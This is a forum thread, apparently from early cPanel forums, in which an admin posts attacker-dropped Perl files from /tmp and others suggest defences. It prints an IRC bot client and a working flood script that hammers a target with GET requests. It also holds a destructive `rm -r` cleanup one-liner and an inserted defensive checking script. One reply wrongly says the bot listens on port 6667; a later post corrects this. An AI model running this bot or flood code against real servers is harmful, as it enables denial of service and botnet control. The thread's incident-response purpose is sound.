  1. #1
    Member
    Join Date
    Jul 2002
    Posts
    367

    Suspicious file in /tmp dir

    Hi All,

    I have got a suspicious file in our /tmp dir. This is the code they placed. Can anyone tell me how we could avoid these?



    #!/usr/bin/perl

    use IO::Socket;

    $ARGC=@ARGV;

    $serv=$ARGV[0];
    $chan=$ARGV[1];
    $botnick=$ARGV[2];


    $sock = IO::Socket::INET->new(
    PeerAddr => $serv,
    PeerPort => 6667,
    Proto => 'tcp' ) or die "****************";

    while($line = <$sock>){
    print $line;

    sleep 3;
    print $sock "NICK $botnick\nUSER bot 0 0 :CCS bot\n";
    last;


    }

    while($line = <$sock>){
    print $line;
    #use next line if the server asks for a ping
    if($line =~ /^PING/){
    print $sock "PONG :" . (split(/ :/, $line))[1];
    }
    if($line =~ /(376|422)/i){
    print $sock "NICKSERV :identify nick_password\n";
    last;
    }
    }

    sleep 3;
    print $sock "JOIN #$chan\n";
    sleep 2;
    print $sock "PRIVMSG #$chan :elite hackbot connected\n";

    while ($line = <$sock>) {
    ($command, $text) = split(/ :/, $line); #$text is the stuff from the ping or the text from the server

    cPanel.net Support Ticket Number:
    Last edited by shann; 06-23-2003 at 05:31 PM.

  2. #2
    Member
    Join Date
    Mar 2003
    Posts
    863


    I hope for your sake you had a firewall active when they dropped this in /tmp. It listens for incoming connections on port 6667, then all they have to do is log in through port 6667 and you are owned.

    If you didn't have a firewall you should probably check to make sure you haven't been rooted.


  3. #3
    Member
    Join Date
    Jul 2002
    Posts
    367


    Thanks for your reply. Can you recommend some good firewall?

    Thanks sexyguy


  4. #4
    Member
    Join Date
    Mar 2003
    Posts
    863


    Originally posted by shann
    Thanks for your reply. Can you recommend some good firewall?

    Thanks sexyguy

    So you didn't have a firewall? I'm using Bastille. You had better download chkrootkit, compile it, run it and look for signs of a rootkit. And you had better close port 6667 soon. Again, I really question cPanel security here. This is now the third drop into /tmp that I've seen in a week, so my question would be: what is being done about this?


  5. #5
    Member
    Join Date
    Jun 2002
    Posts
    156


    *Please note*

    No liability taken for errors, faults or issues which come from using the information posted here.


    Touch a file in /etc/cron.hourly or /etc/cron.daily and call it

    rmtmp.sh


    Edit the file and paste this into it:

    pushd /tmp;rm -r `ls | grep -v horde.log | grep -v lost+found | grep -v mysql.sock`;popd


    Let it run. Just a warning: it does interfere a little with Horde and other programs which use session IDs.

    Run it daily if you like.


  6. #6
    Member
    Join Date
    Oct 2002
    Posts
    751


    Originally posted by sexy_guy
    So you didn't have a firewall? I'm using Bastille. You had better download chkrootkit, compile it, run it and look for signs of a rootkit. And you had better close port 6667 soon. Again, I really question cPanel security here. This is now the third drop into /tmp that I've seen in a week, so my question would be: what is being done about this?
    If you have mounted /tmp as noexec,nosuid (you really have to do this yourself, obviously) it will be difficult for someone to execute the script.

    An httpd chroot would be nice, of course.
    What actually happened to the development of httpd chroot:

    Tue Apr 22 06:43:26 EDT 2003
    6.x Build#24
    ---------------------------------------------------------------

    better chroot httpd support

    For now, mounting /tmp as noexec,nosuid, changing permissions on compilers to root only, blocking unused ports and of course keeping your server software up to date will make it very difficult for people to succeed with these /tmp attacks.

    With PHP you could set each user to use the /tmp in their home directory, instead of the /tmp directory everyone uses. I'm not sure what the advantage would be though, except for the fact that all PHP sessions are no longer stored in the 'general' /tmp.

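The two defensive measures discussed in posts #5 and #6 (a /tmp cleanup job and mounting /tmp noexec,nosuid) can be checked from a script. The following is an added example written for this thread, not code from any poster or from cPanel: it parses a /proc/mounts style line to confirm /tmp carries noexec and nosuid, and lists files under a directory whose first bytes are a "#!" interpreter line, the shape of the perl drops quoted above. The mount line and the files in the demo are constructed test data.

```shell
#!/bin/sh
# Added example, not from the thread. Two checks for the /tmp hardening
# discussed above: mount options on /tmp, and script files dropped where
# only session/data files belong.

# tmp_mount_has_opts "<mounts-line>": exit 0 only when the line describes
# /tmp and its option list contains both noexec and nosuid.
tmp_mount_has_opts() {
    opts=$(printf '%s\n' "$1" | awk '$2 == "/tmp" { print $4 }')
    [ -n "$opts" ] || return 1            # not a /tmp mount line at all
    case ",$opts," in
        *,noexec,*) ;;
        *) return 1 ;;
    esac
    case ",$opts," in
        *,nosuid,*) return 0 ;;
        *) return 1 ;;
    esac
}

# find_script_drops <dir>: print every regular file under <dir> whose first
# two bytes are "#!" (shell/perl scripts such as the ones quoted in the thread).
find_script_drops() {
    find "$1" -type f 2>/dev/null | while IFS= read -r f; do
        if [ "$(head -c 2 "$f" 2>/dev/null)" = "#!" ]; then
            printf '%s\n' "$f"
        fi
    done
}

# Stand-alone demo on constructed data (a fake mount line, a scratch dir).
demo() {
    line="/dev/sda3 /tmp ext3 rw,noexec,nosuid,nodev 0 0"   # constructed
    if tmp_mount_has_opts "$line"; then
        echo "/tmp is mounted noexec,nosuid"
    else
        echo "/tmp lacks noexec and/or nosuid: remount it with those options"
    fi
    d=$(mktemp -d)
    printf '#!/usr/bin/perl\nuse IO::Socket;\n' > "$d/sess_a"   # constructed drop
    printf 'plain session data\n' > "$d/sess_b"                 # legitimate file
    echo "script files found:"
    find_script_drops "$d"
    rm -rf "$d"
}

[ "${0##*/}" = "tmpcheck.sh" ] && demo
```

On a live server, feed `tmp_mount_has_opts` the output of `grep ' /tmp ' /proc/mounts` and point `find_script_drops` at /tmp; a hit from the second check is a cue to run chkrootkit as suggested in post #4, not just to delete the file.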

  7. #7
    Registered User
    Join Date
    Feb 2003
    Posts
    3


    Originally posted by sexy_guy
    I hope for your sake you had a firewall active when they dropped this in /tmp. It listens for incoming connections on port 6667, then all they have to do is log in through port 6667 and you are owned.

    If you didn't have a firewall you should probably check to make sure you haven't been rooted.

    sexy_guy: That is absolutely incorrect. The script connects to the IRC server at the hostname and port specified (ARGV parameters via command prompt or other method of execution). It does not in any manner listen on port 6667 on your server. Having a firewall blocking incoming connections to port 6667 would be useless.


  8. #8
    Member
    Join Date
    Jul 2002
    Posts
    367


    Hi,

    The thing is they keep putting files in the /tmp dir and executing them, making our server go down.

    This is the latest code they placed. How could I avoid this? We don't have a separate partition for the /tmp dir.

    This is the latest code they placed, and our server went down.

    #!/usr/bin/perl

    use IO::Socket;

    $ARGC=@ARGV;

    $serv=$ARGV[0];


    $sock = IO::Socket::INET->new(
    PeerAddr => $serv,
    PeerPort => 80,
    Proto => 'tcp' ) or die "****************";

    system("perl get.pl $serv &");
    system("perl get.pl $serv &");


    while(1){
    print $sock "GET\n";
    }


    Any help?
    Thanks

